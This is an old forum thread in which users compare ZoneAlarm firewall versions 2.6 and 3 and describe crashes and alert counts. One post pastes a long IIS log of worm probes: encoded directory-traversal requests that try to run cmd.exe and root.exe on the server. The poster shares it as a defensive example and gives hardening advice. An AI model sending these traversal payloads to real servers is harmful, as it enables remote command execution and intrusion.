zone alarm 2.6 vs 3

[BZ]

I've read a lot of complaints about zone alarm 3 from people who say it screwed up their systems and they wish they could go back to 2.6.

Does anyone know if 3 if safer than 2.6 or is it just cosmetic changes?

And does anyone know if either of them are really any good? I run IIS so I feel pretty vulnerable

 

[corkyg]

I dunno - I use ZP Pro 3.5.169.002 - works perfectly and does a great job.

 

[holycow]

i use za pro 3.5.169.002.. it works perfectly and i haven't had any problem with it..

 

[jadinolf]

Here's my story:

I had ZA 3x installed on all four of my computers. All of a sudden when email arrived, my computer locked up. I suspected my browser or Norton antivirus.

Finding that these were not the problem, I uninstalled Zone Alarm 3x and installed version 2.6 and the problem went away. I have no problem using 2.6 and I don't think that the functionality is that much different from the latest version.

The latest version works fine on my other three computers so I imagine that another program installed on the problem computer may have caused a conflict with 3x.

I could be wrong.....

Incidently, when uninstalling the new version, two files that were in use by windows had to be deleted in DOS.

 

[LegionX]

i use ZA 3 (1025 version i think) and havent had any system glitches but i do find i have to disable it alot to download stuff from sites like creative labs, EA Games (just to click links) and other sites. seems like it doesnt like certain java or whatever. i dont use it for email because i have nortons checking it so that might be your problem.

only thing i worry about is that it seems to take a long time for the ZA icon to appear on my tray and wonder if it takes that long to protect my system when i boot up. anyone know?

also seems like i get hit by alot of "high" threats and wonder what happens if i dont have za on when i need to download something that wont with it enabled.

 

[glugglug]

Originally posted by: BZ
And does anyone know if either of them are really any good? I run IIS so I feel pretty vulnerable

I use ZA 3.5.169.002, it is decent, although there is a known hole where if you don't password protect it (pretty damn inconvenient if you do!), a program can temporarily turn your firewall off by pretty much following the uninstall instructions and blocking a confirmation dialog from popping up!! AFAIK there are no plans to fix this!

It will NOT protect you from a worm attack that looks like this in my weblogs about once a day (sometimes more):

2002-12-29 09:43:27 207.6.75.122 - 192.168.123.163 80 GET /MSADC/root.exe /c+dir 403 -
2002-12-29 09:43:28 207.6.75.122 - 192.168.123.163 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:28 207.6.75.122 - 192.168.123.163 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:30 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:30 207.6.75.122 - 192.168.123.163 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:31 207.6.75.122 - 192.168.123.163 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:31 207.6.75.122 - 192.168.123.163 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-12-29 09:43:32 207.6.75.122 - 192.168.123.163 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:32 207.6.75.122 - 192.168.123.163 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:33 207.6.75.122 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:33 207.6.75.122 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:34 207.41.77.161 - 192.168.123.163 80 GET /scripts/root.exe /c+dir 404 -
2002-12-29 19:03:36 207.41.77.161 - 192.168.123.163 80 GET /MSADC/root.exe /c+dir 403 -
2002-12-29 19:03:37 207.41.77.161 - 192.168.123.163 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:39 207.41.77.161 - 192.168.123.163 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:40 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:40 207.41.77.161 - 192.168.123.163 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:42 207.41.77.161 - 192.168.123.163 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:43 207.41.77.161 - 192.168.123.163 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-12-29 19:03:44 207.41.77.161 - 192.168.123.163 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:44 207.41.77.161 - 192.168.123.163 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:46 207.41.77.161 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:47 207.41.77.161 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:48 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:48 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:49 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:49 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:44:04 203.167.91.242 - 192.168.123.163 80 GET / - 400 -
2002-12-29 20:17:28 207.41.77.182 - 192.168.123.163 80 GET /scripts/root.exe /c+dir 404 -
2002-12-29 20:17:30 207.41.77.182 - 192.168.123.163 80 GET /MSADC/root.exe /c+dir 403 -
2002-12-29 20:17:31 207.41.77.182 - 192.168.123.163 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:32 207.41.77.182 - 192.168.123.163 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:34 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:34 207.41.77.182 - 192.168.123.163 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:36 207.41.77.182 - 192.168.123.163 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:37 207.41.77.182 - 192.168.123.163 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-12-29 20:17:39 207.41.77.182 - 192.168.123.163 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:39 207.41.77.182 - 192.168.123.163 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:40 207.41.77.182 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:42 207.41.77.182 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:43 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:43 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:45 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:45 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 23:33:35 62.3.27.71 - 192.168.123.163 80 HEAD /iisstart.asp - 500 -
2002-12-29 23:33:36 62.3.27.71 - 192.168.123.163 80 HEAD /script/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:37 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:39 62.3.27.71 - 192.168.123.163 80 HEAD /win2000/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:40 62.3.27.71 - 192.168.123.163 80 HEAD /windows/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:42 62.3.27.71 - 192.168.123.163 80 HEAD /script/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:43 62.3.27.71 - 192.168.123.163 80 HEAD /script/.._../.._../.._../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:44 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:33:46 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:47 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:48 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:50 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:51 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:52 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:57 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:58 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:00 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:01 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..À/..À/..À/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:02 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:04 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:05 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:06 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:08 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:09 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:11 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:12 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:13 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:15 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á..Á..Á..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 500 -
2002-12-29 23:34:16 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:18 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 500 -
2002-12-29 23:34:19 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:20 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 500 -
2002-12-29 23:34:22 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:23 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:24 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:26 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:27 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:28 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/.._../.._../.._../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:30 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/.._../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:31 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:33 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:34 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:35 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:37 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:38 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..ü????¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:39 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/check.bat/..À/..À/..À/winnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:41 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:42 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/check.bat/..Á..Á..Áwinnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:44 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:45 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/root.exe /c+dir+c:\ 404 -

For IIS to be semi-secure, you need to get rid of all the standard administrative directories that are installed by default. Any result code (2nd to last column, followed by a - in the log above) less than 400 in response to those attacks is cause for concern.

 

[BZ]

you know the real reason I asked about the difference between them was that I get a lot more "high threat" alerts with 3 than with the older version - but somehow I just don't believe its really catching a lot more attacks - if it really is, then I definitely want to run 3

 

[LegionX]

well when going form a 2 to a 3 version i would think there were some big changes/fixes that improve everything so it is very possable that it is catching more than before... people find loop holes in everything sooner or later otherwise we could still be using nortons antivirus that was made in 98 or something.

i think most of the smaller updates fix small bugs they find and update how they stop the spam. i am pretty sure that those companies that create the pop up ads are trying to circumvent any program that keeps them from showing.

 

[Rottie]

I have no problem with ZA Pro 3.5.169.002 with Norton AV 2002 so I don't believe it caused your problem. I let them checking email with outlook.

I leave default setting on ZA Pro 3

 

[dude]

Originally posted by: BZ
you know the real reason I asked about the difference between them was that I get a lot more "high threat" alerts with 3 than with the older version - but somehow I just don't believe its really catching a lot more attacks - if it really is, then I definitely want to run 3

You can make it not show the net alert advisor, or at least I think that's what it's called.